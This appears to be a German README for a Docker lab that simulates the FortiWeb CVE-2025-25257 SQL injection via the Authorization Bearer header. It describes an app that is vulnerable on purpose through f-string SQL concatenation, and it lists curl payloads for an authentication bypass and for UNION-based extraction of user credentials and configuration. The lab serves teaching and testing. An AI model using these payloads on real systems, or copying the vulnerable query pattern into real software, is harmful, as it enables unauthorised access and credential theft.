
Reproduzierbares Docker-Lab für CVE-2025-25257, das SQL-Injection-Bypass und Datenexfiltration über den HTTP-Authorization-Header auf einem simulierten FortiWeb-Endpunkt demonstriert.
Architektur des Experiments (die Umgebung simuliert die verwundbaren Komponenten von FortiWeb)
Verwundbarer Endpoint : /api/system/fabric/config
Injektionsvektor : HTTP-Header Authorization: Bearer
Mechanismus : Direkte SQL-Verkettung (Python f-String)
Authentifizierung : Keine (vollständiger Bypass)
Datenbank : SQLite (zu Demonstrationszwecken)
cve-2025-25257
├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md
Dockerfile : absichtlich verwundbarer HTTP-Dienst / stellt eine API ohne Authentifizierung bereit
docker-compose.yml : orchestriert einen reproduzierbaren verwundbaren Dienst / macht die angreifbare API über http zugänglich / isoliert die Experimentierumgebung
requirements.txt : stellt eine stabile und reproduzierbare Umgebung sicher
app.py : implementiert einen Pre-Authentifizierungs-Endpoint / akzeptiert Benutzereingaben über Authorization / verkettet diese Eingabe in eine SQL-Abfrage / ermöglicht Authentifizierungs-Bypass und Datenextraktion
init_db.py : bereitet einen ausnutzbaren Datensatz vor / ermöglicht eine klare Demonstration von Authentifizierungs-Bypass und Datenexfiltration
payload.txt : liefert einen minimalen, kontrollierten und beobachtbaren Proof-of-Concept zur Codeausführung
docker-compose build
docker-compose up -d
docker-compose ps
docker-compose logs -f
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"
docker-compose down
docker-compose down -v
docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest